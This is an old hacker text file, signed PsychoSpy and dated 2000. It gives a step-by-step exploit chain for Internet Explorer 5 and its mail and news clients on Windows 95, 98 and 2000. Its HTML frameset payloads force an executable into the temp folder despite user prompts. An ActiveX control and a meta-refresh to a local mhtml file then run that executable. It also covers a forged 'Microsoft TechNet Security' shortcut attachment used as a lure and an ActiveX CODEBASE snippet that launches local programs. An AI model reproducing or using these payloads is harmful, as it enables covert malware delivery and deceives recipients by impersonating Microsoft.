Intro
~~~~~
Internet Explorer 5, and the mail and news clients which come with it 
(on Win95/98/2K) are very strange in that they choose to ignore user input. 
More specifically, this allows us to manually force a file onto the target
computer, despite all prompts and warnings.


How can this be done?
~~~~~~~~~~~~~~~~~~~~~
We begin by creating a simple HTML FrameSet and embed, in base 64, our file:
<frameset rows=3D"10%,*">
<frame src=3D"mars.exe">
</frameset>

What happens?
~~~~~~~~~~~~~
What we do now is create a very simple HTML Mail or News file and send it to
the target computer. When they receive this file, and open it, the recipient
will be prompted as to whether they would like to "save" "open" or "cancel".
None of these really work. When the recipient decides which one to choice, 
the files is being injected into the temp folder. Selecting any of the
three choices becomes completely useless. The file is still delivered to
the temp folder. Even if their system's "Security Zone" sets it to
DISABLE, they just get a slightly different prompt which only allows you
to press OK, and this is, once again, useless.

No matter what, the file is delivered into the temp folder.

So? What next?
~~~~~~~~~~~~~~
Well, next create a second file which contains a new ActiveX control:
(CLSID:15589FA1-C456-11CE-BF01-00AA0055595A)
Which allows us to execute files locally. We embed the simple JavaScripting
that runs this together with the ActiveX control, in base 64, and embed that in
a second html frame:

<frameset rows=3D"10%,*">
<frame src=3D"mars.exe" >
<frame src=3D"lunar.mhtml" >
</frameset>

Then we apply the VERY simple HTTP-EQUIV meta tag of refresh.

<meta http-equiv=3D"refresh"content=3D"5;
url=3Dmhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">

and repack again in base64.

What are the results?
~~~~~~~~~~~~~~~~~~~~~
The first file deposits the *.exe and second *.mhtml files into the
temp directory. The client will be asked as to save, open, or cancel.
No matter what choice they make, these files will be deposited as soon
as the prompt has been close. The meta refresh will bounce to the 
*.mhtml in the temp dir, open it and execute the JavaScript and ActiveX
control and run the *.exe.

None of the Security Zone settings will prevent this because we are working
locally from the temp directory.


Now you want to do this over e-mail?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Of course it can! You have a greater chance of failing though.

Create two sets of html messages:

The first one comprising of the file to be delivered:


<frameset rows=3D"10%,*">
<frame src=3D"refresh.bat" >
</frameset>

Note: to be executed from mail client. Simple *.bat containing @exit


The second comprising of a fraudulent, manufactured *.url:

Content-Type: application/octet-stream;
name=3D"Microsoft TechNet Security.url"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename=3D"Microsoft TechNet Security.url"

[DEFAULT]
BASEURL=3DC:\WINDOWS\TEMP\refresh.bat
[InternetShortcut]
URL=3DC:\WINDOWS\TEMP\refresh.bat

We include a fake link: <font color=3Dblue style=3D"cursor:hand">....

The recipient will then be forced to entertain the fraudulent *.url

--

You can get any local .exe to execute in IE by referring to it in the
CODEBASE parameter of an ActiveX object tag. The CLASSID can be anything
but all zeros.  Here is a code snippet, courtesy of Dildog, which will
execute calc.exe if it is in c:\windows\system32\

<HTML>
<HEAD>
</HEAD>
<BODY>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='c:\windows\system32\calc.exe'></OBJECT>
</BODY></HTML>

The other problem is the fact that .exe files can get downloaded to your
local system without you being able to cancel the operation. 
I tested the malware exploit on win98 with medium security settings 
(the default) and it worked as promised.

But what was far worse was it worked at the high security setting also.  
A warning message came up saying "Due to your security settings you cannot
download that file." You press OK and the file is downloaded anyway. 
Then it executes when used as the codebase of an ActiveX control.

The demo exploit won't work in W2K because the temp directory where the
.exe is downloaded to is  "c:\documents and
settings\'username'\local settings\temp".  If it is possible to get the
username through JavaScript and another ActiveX control it could possibly
be made to work there also.



I hope you enjoyed this file and find it useful. 
It's early in the morning/late at night so I'm kinda burnt.

The Non-Existent Crew rocks! We're proud to be Canadian eh!

-- PsychoSpy
   PsychoSpy@HushMail.Com
   ICQ#: 5057653

   07.16.00